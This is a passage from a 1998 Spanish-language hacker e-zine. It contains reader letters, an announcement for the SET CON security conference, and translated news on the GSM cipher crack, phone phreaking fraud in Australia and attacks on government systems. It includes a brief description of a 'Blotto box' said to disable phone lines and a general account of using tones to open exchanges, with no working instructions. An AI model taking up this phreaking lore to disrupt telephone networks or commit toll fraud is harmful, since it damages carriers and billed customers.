podemos enviar nada a nadie, okis ?

#hacker
#hack
#hack_novatos
#hackers
#hack_the_world
#hackgov ]

<---------------------------------------------------------------------------->

Date: Wed, 27 May 1998 13:23:08 GMT
From: Liang Xiao Zhu <casazhu@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Un saludo

Hola conde vampiro, quiero que me enseñes como entrar al ordenador de
otra persona.
No voy ha hacer nada ilegar solo soy cybernauta que quiere aprender algo
mas, gracias.

<------>

[ Pues como siempre decimos no damos clases privadas y YA ESTA BIEN DE
RECIBIR ESTE TIPO DE MAIL'S, OKIS ? Para eso tienes vuestro/nuestro
ezine. ]
<---------------------------------------------------------------------------->

Date: Thu, 04 Jun 1998 04:32:33 GMT
From: "Damian Broy" <dbroy@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: sugerencia.....

Hola muchachos, visite su page en la red y me percate de que en la
seccion de boxes hay un error en la Blotto Box. Esta solo sirve para
paralizar (o hacer mierda, anyway) toda una zona correspondiente
a un prefijo de caracterisitica telefonica, por medio del simpatico
envio de un gran flujo electrico a travez de la linea telefonica.
Espero haber sido util y los felicito por su pagina, si mi
interpretacion fue considerada erronea por uds pido disculpas.
suerte!!!!!!
Cook2.

Damian Broy

dbroy@xxxxxxxxxxxxxx

<------>

[Thx por la informacion. Prometemos cambiarlo lo antes posible. Y no te
preocupes, tu interpretacin es correcta, cualquiera puede tener fallos
:-) ]


<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

------------------------
- NOTICIAS UNDERGROUND -
------------------------

- J.J.F. / HACKERS TEAM -

<---------------------------------------------------------------------------->

I JORNADAS SOBRE SEGURIDAD EN LAS NUEVAS TECNOLOGIAS

14, 15 y 16 de Agosto
Madrid
_ _ _ _ _ _ _ _ _
_.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-.._

Durante mucho tiempo hemos notado la falta de unas jornadas de estas
caracteristicas, en las que se acercara a la gente de a pie los aspectos
man interesantes de la seguridad informatica y las telecomunicaciones.

Por primera vez en EspaÒa queremos organizar estas jornadas que den
pie a la realizacion de otras muchas y que esperamos tengan su continuidad
en proximos aÒos.

Para eso contamos con el respaldo oficial de la asociacion de estudiantes
ACD, a la que desde ya agradecemos su participacion y esperamos contar con
ellos en las futuras ediciones de SET CON


-[ QUE ES SET CON ]-

SET CON no es ni mas ni menos que una reunion de gente interesada en los
temas de seguridad en redes, seguridad informatica, programacion,
comunicaciones...

Para estas primeras jornadas disponemos de un ciclo de conferencias,
nuestra Secure Party, proyecciones de video, concursos, y el resto de
actividades que se nos vayan ocurriendo. Para ello, necesitamos de vuestra
colaboracion.


-[ CONFERENCIAS ]-

En un principio estan previstas tres conferencias o debates por dia,
exceptuando el domingo, en el que solo habra una conferencia.

En el momento de escribir este anuncio tenemos preparadas estas
conferencias:

* "Seguridad en Windows NT"
Conferencia en la que Che°y nos hablara del sistema
operativo Windows NT.

* Legislacion y delito informatico
* Virus
Posible participacion de Anyware y Panda. Nos gustaria
que la gente del 29A tambien participase.
* ...

Los que esteis interesados en participar en alguna conferencia o alguna
mesa redonda, escribid a <setcon@bigfoot.com>, indicando claramente sobre
que quereis hablar, que dias teneis disponible, y cual es vuestro nombre.


-[ CAMPEONATOS ]-

Para demostrar nuestros conocimientos o simplemente pasar un buen rato,
con la posibilidad de importantes premios.

{ Trivial Security Edition }

Que decir sobre este entretenido juego de toda la vida. Pon a prueba
tus conocimientos en los mas diversos temas como criptografia,
sistemas operativos, protocolos, lenguajes de programacion,
telefonia o hardware. Quien sera el ganador???

{ Campeonato de Quake }

Nada que ver con la seguridad, pero si con pasar un buen rato.
Simplemente por eliminacion, a ver quien es el mas violento, el mas
listo, el mas... Quake

{ Barricada }

El campeonato mas interesante de todos. Coge tu equipo y conectalo
a la red barricada. Lo unico que tienes que hacer es conseguir
que tu ordenador mantenga un servidor HTTP (puerto 80), servidor
de correo y servidor de FTP. Pero eso no es todo. A cada participante
se le suministrara un archivo, que tendra el mismo nombre para
todo el mundo y debera estar en el mismo directorio, aunque el
contenido no sera el mismo. No ganara el que mas tiempo este
operativo. Tampoco sera el que obtenga mas archivos ajenos. Sera
el que consiga ambas cosas a la vez.

{ Gymkana }

El ultimo dia se realizara una gymkana en los alrededores del local
de las Jornadas. Se trata de demostrar que tambien tenemos algo de
fisico ;)

Habra pruebas tradicionales como el lanzamiento de discos duros
(si alguien los presta), o el de diskettes, hasta pruebas nuevas
como determinar la informacion de una tarjeta perforada... por
el tacto


-[ PREMIOS ]-

Parte de los premios pueden salir de donaciones. Asi que esperamos
vuestro apoyo en este aspecto. Personalmente considero como un gran
premio la obtencion de un speccy original ;)


-[ PROYECCIONES ]-

Durante las jornadas se proyectaran peliculas que hayan tenido o tengan
algo de importancia dentro del mundo de la seguridad informatica. Seran
peliculas como "Juegos de Guerra", "Fisgones" y hasta incluso "Hackers"
(Alguna habra que criticar, no? ;) )


-[ MISC ]-

Quedan por resolver temas de alojamiento, transporte, horarios. Permaneced
atentos a la pagina de SET (http://www.geocities.com/SiliconValley/8726),
sonde apareceran los proximos anuncios y el enlace a la pagina de la
SET CON 98.

Para cualquier tipo de duda o colaboracion, escribid a
<setcon@bigfoot.com>

Have P/Hun
Falken

<---------------------------------------------------------------------------->

CRACKEADO EL ALGORITMO DE LOS TELEFONOS DIGITALES (GSM).

Investigadores crackean el codigo de los Telefonos Celulares
por John Markoff

San Francisco - En un logrado intento de crack un conocido metodo de
encriptacion para prevenir la clonazion de los telefonos digitales moviles,
un grupo de investigadores informaticos de la Universidad de California
creen que tiene importantes evidencias que el sistema empleado por los
telefonos es deliberadamente debil para permetir la vigilancia del gobierno.

El metodo crackeado es conocido como GSM (Groupe Speciale Mobile). El
sistema de encriptacion mas usado en el mundo para los telefonos celulares,
el GSM es usado en unos 80 millones de aparatos alrededor del mundo y al
menos unos 2 millones de telefonos en los Estados Unidos.

Mas de los 58 millones de telefonos analogicos y digitales americanos
estan basados en una variedad de otros metodos, pero 20 compañias americanas
dedicacas a telefonia digital celular incluidas Pacific Bell, una division
de SBC Communications, y Omnipoint corp. utilizan el estandar GSM.

Dos investigadores de la Universidad Californiana Berkeley anunciaron
el pasado Lunes que ellos havian logrado romper el metodo GSM usando un
ordenador para determinar el numero secreto guardado en el Subscriber
Identify Module (SIM), una especie de tarjeta de credito dentro del
telefono.

Si los criminales pudiesen crackear el metodo, ellos podrian clonar
los telefonos protegidos mediante encriptacion GSM, para ello, tendrian que
detectar un numero de un telefono y usarlo en otro telefono para fradulentar
las llamadas. Por otro lado, los investigadores y los representantes de las
compañias telefonicas celulares dijeron el Lunes que el uso de la clonacion
era remota en comparacion con la vulneravilidad de los telefonos analogicos
celulares. Por una cosa en concreto, ya que dijeron, que para crackear el
GSM se requiere al menos unas 10 horas de pruebas electronicas y la
utilizacion de maquinas muy potentes.

Lo que era mas intrigante todavia que el hecho de la seguridad, era
que crackeando el codigo se descubrio que el llave digital usada en los GSM
posiblemente fue manipulada durante el proceso de diseño para permitir a
las agencias gubernamentales espiar las conversaciones celulares.

Aunque la llave. conocida como A5, es un sistema de encriptacion de
64 bit, generalmente un codigo dificil de crackear, los investigadores han
determinado que los ultimos 10 digitos eran actualmente ceros. Esto
significa que con potentes ordenadores, sistemas utilizados por las
agencias de inteligencia gubernamentales, puede ser posible decodificar una
conversacion telefonica rapidamente, explica Marc Briceno, director de la
Smartcard Developers A°ociation, una pequeña organizacion de programadores.
"Aparemente la llave se debilito intencionadamente", dice. "Y no puedo
pensar en ninguna razon para hacer esto intencionadamente"
.

Durante los ultimos años, la industria informatica esta plagada de
rumores sobre que las agencias gubernamentales han forzado o persuadido a
los desarrolladores de cripto sistemas a implementar debilidades matematicas
en los sistemas de seguridad o incluso puertas traseras. Algunos de estos
rumores hablan sobre la N
1005
SA (National Security Agency) o la CIA (Central
Intelligence Agency) que teniendo ellos mismos criptografos, diseñando
programas criptograficos para ellos mismos y despues lo liberan, para
asegurarse que ellos pueden decodificar datos informaticos o conversaciones
telefonicas.

Algunos rumores han cogido importancia, en parte, sobre el autentico
origen del sistema GSM. Expertos criptografos dicen que las primeras
formulas matematicas, o los algoritmos, en el sistema criptografico GSM
proviene originalmente de Alemania o Francia como parte de una creacion
sobre un estandar en los años 1986 y 1987.

"Es imposible esto hacer esto, por lo que debe haber otras razones",
alega Stewart Baker, un abogado de Washington que fue antiguamente abogado
de la NSA. La NSA es una de las agencias mas acusadas de sospecha debido
en mayor parte ya que su mision es interceptar llamanadas telefonicas.
"La especulacion es facil, y nunca muere", dice.

Aunque, muchos expertos de la industria no pueden pensar en una buena
razon de porque un algoritmo encriptador debe ser debilitado
intencionadamente, otra razon que para permitir la vigilancia.

"Esto a sido debilitado intencionadamente", dice Phil Karn, un
ingeniero de la Qualcomm Inc., una compañia de telefonia celular que ha
desarrollado un estandar alternativo al GSM. "Quien crees que esta
interesado en hacer una cosa como esa?"
.

La debi llave fue descubierta por dos investigadores. Ian Goldberg y
David Wagner, ambos miembros de la universidad de California en el grupo de
Aplicaciones de Seguridad en Internet, Autentificacion y Criptografia en
Berkeley. Ellos hicieron hincapie en que habian detectado facilmente el
fallo de seguridad que permite clonar los telefonos celulares.

La industria de la telefonia celular es consciente del fallo en los
GSM pero dice que realmente a reforzado su justificacion en la seguridad
de los telefonos digitales.

"Me quito el sombrero antes estos muchachos, han hecho un magnifico
trabajo,"
dice George Schimtt, presidente de la Omnipoint. "Yo les daria
credito, pero no estamos en peligro de fraude."


Los investigadores y la Smartcard Developers A°ociation dicen que el
exito del ataque se debe a las nuevas evidencias de las practicas de la
industria a esconder las tecnicas de seguridad del publico. La autentica
seguridad, ellos alegan, requiere la publicacion de los algoritmos para
que expertos independientes puedan verificar la fuerza del sistema.

"Esto demuestra otra vez un fallo en un proceso de diseño cerrado."
dice Briceno. "Estas compañias se privan ellos mismoa de la seguridad, pero
ahora las gallinas han llegado a casa para freirse"
.

Link's Relacionados:

Another GSM crack info page at
http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html

The GSM algorithm, COMP128 can be seen in a C program source code at the
SmartCard Developers A°ociation Web site at
http://www.scard.org/gsm/a3a8.txt

European Telecommunications Standard Institute main page at
http://www.etsi.fr/

Info about SIM at
http://www.etsi.fr/brochures/stateart/vedder.htm

<---------------------------------------------------------------------------->
HACKERS DEL SERVICIO SECRETO INCAPACES DE CRACKEAR UNA INTRANET.

PA 4/21/98 11:06 AM

By Giles Turnbull, PA News

Hackers profesionales del servicio secreto fueron pillados en un
intento de hackear el sistema de comunicaciones interno de seguridad del
Gobierno, que fue puesto en marcha hoy mismo.

Durante el desarrollo y planificacion de la Intranet, gente del GCHQ
y otros organismos de seguridad similares tambien fueron pillados en un
intento de hackear el sistema

Pero ellos fallaron.

Por otro lado, el ministro encargado del projecto admitio hoy que
mirando los hackeos en los sistemas del Pentagono y de la Nasa en los
EE.UU., el no puede decir que la nueva Intranet sea imposible de crackear.

La Intranet Segura del Gobierno, The Goverment Secure Intranet (GIS),
permitira a los ministros y gente del gobierno a comunicarse mediante
e-mail y usar la herramienta cotidiana del Gobierno, conocida como Agenda.

Una Intranet es un sistema de Internet cerrado que solo puede ser
accedido por ciertas personas. Es un metodo muy popular en grandes compañias
y organizaciones para sus comunicaciones internas.

La primera fase del GIS, lanzada hoy, estara disponible para unas
400 personas que tiene permiso para ver documentos clasificados.

La segunda fase, dentro de algunos meses, sera vista por unas 400,000
personas y se incluiran documentos confidenciales.

Nada clasificado como secreto sera puesto en la Intranet, dice el
ministro en el cargo David Clark, Canciller del Ducado de Lancaster.

Dr Clark dice que el comienzo del sistema a sido crucial para el
futuro de un gobierno electronico.

"Esto a sido el comienzo del futuro sistema de funcionamiento del
gobierno"
, alega.

"Es una revolucion en el modo de hacer gobierno. Cuando llege al
cargo hace un año yo estaba sorprendido de que no havia nada sobre
seguridad electronica en las comunicaciones de los diferentes
departamentos"
.

"Muy pronto en el desarrollo del sistema invitamos a dos grupos de
Hackers del gobierno y les ofrecimos el reto de hackear el sistema. Incluso
les contamos como funcionaba pero aun asi no consiguieron romper la
seguridad"
.

"Estoy muy seguro de que sera muy, muy dificil tal vez, pero no
imposible, romper la seguridad"
añade Dr Clark.

El GIS fue inagurada hoy en 6 departamentos del Gobierno, y la
segunda fase empezara dentro de 6 semanas. Otros departamentos estan
esperando para unirse en los proximos meses.

<---------------------------------------------------------------------------->
ATAQUE HACKER DURANTE EL CHAT DE YELTSIN.

MOSCOW, May 13

Los rusos dicen que han detenido 20 intentos de dejar desconectados
los servidores de Moscu.

Las autorirades rusas dicen de haber detenido unos 20 intentos por
Hackers de desconectar el ordenador en el cual el presidente Boris Yeltsin
estaba usando para su primera charla en Internet en MSNBC.

La agencia de noticias entrevisto a un official de la Agencia Federal
para las Comunicaciones e Informacion Gubermental, Federal Agency for
Goverment Communication and Information (FAPSI) diciendo que los Hackers
intentaron desconectar el servidor, refiriendose a la red gubernamental
que provee el intercambio de mensajes entre Yeltsin e Internet.

Chris Donohue, quien estuvo media hora en la sesion de chat en MSNBC,
dijo que no a havido aparentemente ningun asalto en los servidores de la
compañia, los cuales usan ingles para responder y preguntar. "Nuestro
servidor funciono perfectamente, y ningun ataque fue notificado por nuestro
equipo"
, dice.

Donohue dice que alrededor de unas 4000 personas se unieron al chat.
Los representantes del FAPSI alegan que unos 22,000 usuarios de Internet
visitaron el servidor de chat.

La charla se fue desplazando hacia las nuevas leyes en las politicas
de Moscu.

Pero algunos navegantes del web aprendieron sobre las preguntaron
qye le hacian a Yeltsin que su estado de salud es bueno en estos momentos,
que nunca ha fumado un cigarro, y que su estilo de pelo se debe a la
mujer de su vida y no por un pasado Irlandes y ademas dijo que no creia que
Rusia este preparada para una mujer presidente.

El FAPSI dijo que antiguamente sus lineas eran faciles de hackear
mediante aparatos electronicos de alta tecnologia y sistema criptograficos.

Varios Hackers adolescentes de diferentes paises, incluidos Rusia,
han sido acusados de recientes asaltos a los sistemas informaticos del
Pentagono en los EE.UU. y otras redes militares alrededor del globo.

<---------------------------------------------------------------------------->
AUSTRALIA: MILLONES EN PERDIDAS POR CULPA DE LOS PHREAKERS.

14 May 98 By ANDREW PROBYN.

Millones de dolares estan siendo robados de los usuarios de telefonos
en Australia debido a phreakers que utilizan elaborados scaners telefonicos.

Viviendas, empresas y usuarios de telefonos mobiles estan siendo
victimas de un gran y sistematico fraude telefonico. Las empresas Telstra
y Optus han hecho avances en proteger sus redes de telecomunicaciones,
pero los Hackers han incrementado sus entradas en la red para robar los
codigos de los usuarios.

El Herald Sun ha descubierto muchos casos en los cuales los Hackers
eran acusados de estos actos, incluidos una vivienda que tiene una factura
en llamadas por $10,000 que el niega haber hecho.

Una investigacion del Herald Sun revela que: Llamadas eroticas en
los Estados Unidos, la Guyana, la Republica Dominicana, Rusia y Chile son
generalmente mamipuladas para aparecer en otras cuentas telefonicas.

Los Hackers pueden manipular sus llamadas en Internet, locales e
internacionales para que no sean detectadas.

Las empresas con centralitas internas, PABX, son particularmente
vulnerables y son frecuentementes usadas por los Hackers.

Los telefonos mobiles aunque sus mecanismo de seguridad pueden ser
clonados usando su tarjeta SIM, el chip ID que controla la factura.

Wally Rothwell, representante de la industria de las
telecomunicaciones, dice que el hacking se ha vuelto una costosa realidad.

"El hacking le puede costar a los cosumidores unos millones de
dolares,"
dice. "Algunas de estas llamadas son muy caras - llamadas
eroticas, por ejemplo, puede costar solo $30 el ya conectar."
Durante Enero
y marzo de este año, viviendas y pequeñas empresas niegan haber hecho esas
llamadas.

Mr Rothwell dice que esto es "phreaking" - un faude en el cual el
coste de las llamadas son dirigidas hacia otro usuario - y ha sido probado
en las centralitas. "Por otro lado, tenemos que comprobar si el hacking se
puede hacer remotamente o desde fuera de la centralita de telefonos."


Pero un experto phreaker conto al Herald Sun que los Hackers
establecieron hace algunos años ya como realizar llamadas ilegales en las
centralitas desde lineas externas.

"Cuando yo hacia esto usaba mi ordenador para programar la centralita
para hacer lo que yo quisiera que hiciese,"
dice Mr Dedio.

"Los phreakers expertos suelen usar lineas normales y ordenadores de
sobremesa para generar ciertos sonidos para abrir la centralita"
dice.

El dice que los Hackers tambien acceden a las lineas privadas
manipulando los pitidos de las centralitas en las calles. Ellos pueden
facilmente dirigir llamadas hacia los vecinos, dice, pero esto peligroso.

"Si puedes meterte en una centralita no hace falta que robes la linea
telefonica de alquien,"
dice.

La figura principal del Queensland University of Technology's school
of data comunications, el profesor Bill Caelli, dice que ni siquiera las
sofisticadas redes estan a salvo.

Muchas compañias con sistemas PABX han sucumbido por los miles de
millones en fraude telefonico en el Reino Unido, los Estados Unidos y
Canada. Investigadores de la Universidad de Berkeley, California, el mes
pasado probaron que los telefonos digitales ya no era seguros, clonando
el chip SIM que controla la factura, dice.

La Autoridad Australiana en la Comunicaciones dice que las grandes
compañias tiene que tener extremo cuidado. "Cuanto mas grande es la
compañia, mas grande es la factura y mas facil es para el Hackers
esconderse,"
dice el representante Frank Nowlan. La pena maxima por
phreaking es de cinco años en prision bajo el Acta Federal de Crimenes.

El relaciones de Telstra Stephen Nason dice que Telstra cree que su
red de seguridad es la mas segura del mundo contra los Hackers. "Como
ninguna red es 100% segura, nosotros creemos que la red de Telstra es
muy segura,"
dice.

El hacking no se esta expandiendo, dice, con probablemente unos 50
casos por año en Australia. El relaciones de Optus Kristin Meagher dice
que Optus no tiene evidencia alguna de hacking en sus redes.

(C) 1998 Herald and Weekly Times Limited.
HERALD SUN 14/05/98 P7

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

Bueno, pues aqui acaba el numero cinco y ademas tambien nuestro
primer volumen, que visto los mail's recibios y haciendo balances de los
articulos aportados por los lectores, pues ha gustado mucho. Por supuesto
esto es solo el principio, pero esto no se podra conseguir ni no nos
ayudais aportando articulos, okis?

Pues esto acaba por hoy y esperamos oir de vostros, vuestras
felicitaciones, quejas, criticas, articulos o actos de hack, pues escribe a
nuestro buzon y si tiene miedo pues ya sabes usa nuestra llave publica PGP.
Escribe!!!!!!!

jjf_team@usa.net


ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
- J.J.F. / HACKERS TEAM -

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT